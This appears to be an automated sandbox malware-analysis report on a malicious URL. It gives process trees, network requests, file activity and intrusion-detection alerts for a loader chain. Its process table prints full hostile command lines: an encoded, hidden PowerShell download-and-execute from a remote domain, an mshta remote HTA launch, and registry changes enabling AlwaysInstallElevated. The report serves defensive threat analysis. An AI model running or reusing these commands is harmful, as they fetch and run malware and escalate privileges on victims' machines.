Field | Value
---|---
URL | http://alfcck.xyz/
Full analysis | https://app.any.run/tasks/1bec8c96-4692-4b2e-bf58-ab57e5c8baf4
Verdict | Malicious activity
Threats | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.
Analysis date | September 19, 2019, 07:19:46
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags | —
Indicators | —
MD5 | 004D831EF62DF81933AE190163A41F8E
SHA1 | 0B26FA162CFE81385DA307EEB2331F1CADD7118F
SHA256 | 31F581CC5A5AE9CE187B6D901C1934077EE849E5D06F9164BF07994F03CD986D
SSDEEP | 3:N1Kffkdci:CnUci
PID | CMD | Path | Indicators | Parent process | User | Company | Integrity Level | Description | Exit code | Version
---|---|---|---|---|---|---|---|---|---|---|
3552 | "C:\Program Files\Internet Explorer\iexplore.exe" -nohome | C:\Program Files\Internet Explorer\iexplore.exe | — | explorer.exe | admin | Microsoft Corporation | MEDIUM | Internet Explorer | — | 8.00.7600.16385 (win7_rtm.090713-1255)
3868 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3552 CREDAT:71937 | C:\Program Files\Internet Explorer\iexplore.exe | — | iexplore.exe | admin | Microsoft Corporation | LOW | Internet Explorer | — | 8.00.7600.16385 (win7_rtm.090713-1255)
2700 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAGoAZQBpAHQAYQBjAGEAdgBlAC4AbwByAGcALwBwAHMAMAAwADEALgBqAHAAZwAnACkADQAKAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | iexplore.exe | admin | Microsoft Corporation | LOW | Windows PowerShell | 0 | 6.1.7600.16385 (win7_rtm.090713-1255)
3300 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAGoAZQBpAHQAYQBjAGEAdgBlAC4AbwByAGcALwBwAHMAMAAwADEALgBqAHAAZwAnACkADQAKAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | iexplore.exe | admin | Microsoft Corporation | MEDIUM | Windows PowerShell | 0 | 6.1.7600.16385 (win7_rtm.090713-1255)
1792 | mshta http://jeitacave.org/hta.hta | C:\Windows\system32\mshta.exe | — | iexplore.exe | admin | Microsoft Corporation | LOW | Microsoft (R) HTML Application host | 0 | 8.00.7600.16385 (win7_rtm.090713-1255)
4016 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -windowstyle hidden -exec bypass -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAGoAZQBpAHQAYQBjAGEAdgBlAC4AbwByAGcALwBwAHMAMAAwADEALgBqAHAAZwAnACkADQAKAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | mshta.exe | admin | Microsoft Corporation | LOW | Windows PowerShell | 0 | 6.1.7600.16385 (win7_rtm.090713-1255)
3840 | "C:\Windows\System32\Eventvwr.exe" | C:\Windows\System32\Eventvwr.exe | — | powershell.exe | admin | Microsoft Corporation | MEDIUM | Event Viewer Snapin Launcher | 3221226540 | 6.1.7600.16385 (win7_rtm.090713-1255)
3032 | "C:\Windows\System32\Eventvwr.exe" | C:\Windows\System32\Eventvwr.exe | — | powershell.exe | admin | Microsoft Corporation | HIGH | Event Viewer Snapin Launcher | 0 | 6.1.7600.16385 (win7_rtm.090713-1255)
3912 | "cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 00000001 /f&reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 00000001 /f | C:\Windows\system32\cmd.exe | — | Eventvwr.exe | admin | Microsoft Corporation | HIGH | Windows Command Processor | 0 | 6.1.7601.17514 (win7sp1_rtm.101119-1850)
3148 | reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 00000001 /f | C:\Windows\system32\reg.exe | — | cmd.exe | admin | Microsoft Corporation | HIGH | Registry Console Tool | 0 | 6.1.7600.16385 (win7_rtm.090713-1255)
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---|
3552 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\favicon[1].ico | — | — | —
3552 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | — | — | —
3300 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1BBJB4T09HGVNP9R19V6.temp | — | — | —
1520 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZA9GU7FBZYJS9J6EAXHL.temp | — | — | —
2916 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSCB9BB.tmp | — | — | —
2916 | csc.exe | C:\Users\admin\AppData\Local\Temp\iels5yar.pdb | — | — | —
3908 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RESB9BC.tmp | — | — | —
2916 | csc.exe | C:\Users\admin\AppData\Local\Temp\iels5yar.dll | — | — | —
2916 | csc.exe | C:\Users\admin\AppData\Local\Temp\iels5yar.out | — | — | —
3868 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat | dat | 1543619E2B733B088798D7D0B70374E6 | D387B52DEE27A6B407D13E2910326A83A9647053297CD85E8C75439E21209EF9
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3868 | iexplore.exe | GET | 404 | 104.24.112.108:80 | http://alfcck.xyz/cdn-cgi/apps/head/xGpmLMHiaqCy-agu1ud6fHqKiTo.js | US | — | — | malicious |
3868 | iexplore.exe | GET | 200 | 104.24.112.108:80 | http://alfcck.xyz/3.htm | US | text | 458 b | malicious |
3868 | iexplore.exe | GET | 200 | 104.24.112.108:80 | http://alfcck.xyz/ | US | html | 7.60 Kb | malicious |
3300 | powershell.exe | GET | 200 | 104.28.18.126:80 | http://jeitacave.org/ps001.jpg | US | text | 81.6 Kb | malicious |
1792 | mshta.exe | GET | 200 | 104.28.18.126:80 | http://jeitacave.org/hta.hta | US | html | 466 b | malicious |
4092 | msiexec.exe | GET | 200 | 104.28.18.126:80 | http://jeitacave.org/1U22nOJHFdDmYcgCS.jpg | US | executable | 3.43 Mb | malicious |
4016 | powershell.exe | GET | 200 | 104.28.18.126:80 | http://jeitacave.org/ps001.jpg | US | text | 81.6 Kb | malicious |
3552 | iexplore.exe | GET | 200 | 204.79.197.200:80 | http://www.bing.com/favicon.ico | US | image | 237 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3552 | iexplore.exe | 204.79.197.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
3868 | iexplore.exe | 104.24.112.108:80 | alfcck.xyz | Cloudflare Inc | US | shared |
1792 | mshta.exe | 104.28.18.126:80 | jeitacave.org | Cloudflare Inc | US | shared |
— | — | 104.24.112.108:80 | alfcck.xyz | Cloudflare Inc | US | shared |
3300 | powershell.exe | 104.28.18.126:80 | jeitacave.org | Cloudflare Inc | US | shared |
4016 | powershell.exe | 104.28.18.126:80 | jeitacave.org | Cloudflare Inc | US | shared |
4092 | msiexec.exe | 104.28.18.126:80 | jeitacave.org | Cloudflare Inc | US | shared |
Domain | IP | Reputation
---|---|---|
www.bing.com | — | whitelisted
alfcck.xyz | — | malicious
jeitacave.org | — | malicious
PID | Process | Class | Message |
---|---|---|---|
3868 | iexplore.exe | Potentially Bad Traffic | AV INFO HTTP Request to a *.xyz domain |
3868 | iexplore.exe | Attempted User Privilege Gain | ET WEB_CLIENT Possible Internet Explorer VBscript failure to handle error case information disclosure CVE-2014-6332 Percent Hex Encode |
3868 | iexplore.exe | Attempted User Privilege Gain | ET EXPLOIT Possible Internet Explorer VBscript failure to handle error case information disclosure CVE-2014-6332 Common Function Name |
3868 | iexplore.exe | Attempted User Privilege Gain | ET EXPLOIT Possible Internet Explorer VBscript failure to handle error case information disclosure CVE-2014-6332 Common Construct Hex Encode |
3868 | iexplore.exe | Attempted Administrator Privilege Gain | ET EXPLOIT Possible Internet Explorer VBscript failure to handle error case information disclosure CVE-2014-6332 Common Construct M2 |
3868 | iexplore.exe | A Network Trojan was detected | ET TROJAN Possibly Malicious Base64 Unicode WebClient DownloadString M3 |
3868 | iexplore.exe | Potentially Bad Traffic | AV INFO HTTP Request to a *.xyz domain |
1792 | mshta.exe | Potentially Bad Traffic | ET POLICY Possible HTA Application Download |
1792 | mshta.exe | Attempted User Privilege Gain | ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl |
1792 | mshta.exe | A Network Trojan was detected | ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) |
Process | Message
---|---|
csc.exe | *** HR originated: -2147024774; *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe | *** HR propagated: -2147024774; *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe | *** HR originated: -2147024774; *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe | *** HR propagated: -2147024774; *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe | *** HR originated: -2147024774; *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe | *** HR propagated: -2147024774; *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe | *** HR originated: -2147024774; *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe | *** HR propagated: -2147024774; *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe | *** HR originated: -2147024774; *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe | *** HR propagated: -2147024774; *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144